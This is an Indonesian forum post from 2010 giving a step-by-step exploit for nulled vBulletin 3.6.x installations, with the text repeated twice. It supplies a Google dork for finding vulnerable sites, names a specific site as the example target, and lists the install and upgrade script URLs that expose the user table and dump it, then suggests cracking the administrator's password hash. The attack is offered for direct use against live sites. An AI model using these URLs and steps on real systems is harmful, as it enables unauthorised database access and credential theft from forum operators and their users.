[Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBulletin
Posted: Sun Jun 13, 2010 9:05 am
Vbulletin siapa yang ga kenal? Forum board yang sangat populer dan digunakan oleh forum2 besar di tanah air seperti kaskus, chip.co.id, bluefame(sekarang mereka sudah beralih ke ipboard) dan masih banyak lagi.
Pada vBulletin versi 3.6.x Nulled by NiGHTNiNG bisa dieksploitasi dengan beberapa baris script. Baiklah mari kita coba praktek langsung.
Google Dork :
sebagai contohnya kita coba di http://ex-ukm.com
di browser masuk ke path install web tersebut :
Untuk mengetahui table user database tersebut masuk ke
kita bisa lihat table user bernama vbuser
lalu lakukan langkah berikut
Setelah itu Dump tabel user pada databasenya
buka dengan notepad hasil dump tersebut. dan anda bisa menemukan user admin serta password yang dienkripsi (PR anda untuk memecahkan hash tersebut).
Don`t be Evil
Pada vBulletin versi 3.6.x Nulled by NiGHTNiNG bisa dieksploitasi dengan beberapa baris script. Baiklah mari kita coba praktek langsung.
Google Dork :
Code: Select all
Powered by vBulletin || Nulled by NiGHTNiNG
di browser masuk ke path install web tersebut :
Code: Select all
http://ex-ukm.com/install/upgrade_300.php?
Untuk mengetahui table user database tersebut masuk ke
Code: Select all
http://ex-ukm.com/install/upgrade_300.php?step=1
lalu lakukan langkah berikut
Code: Select all
http://ex-ukm.com/install/upgrade_300.php?step=2
Setelah itu Dump tabel user pada databasenya
Code: Select all
http://ex-ukm.com/install/upgrade_301.php?step=backup&do=sqltable&table=vbuser
Don`t be Evil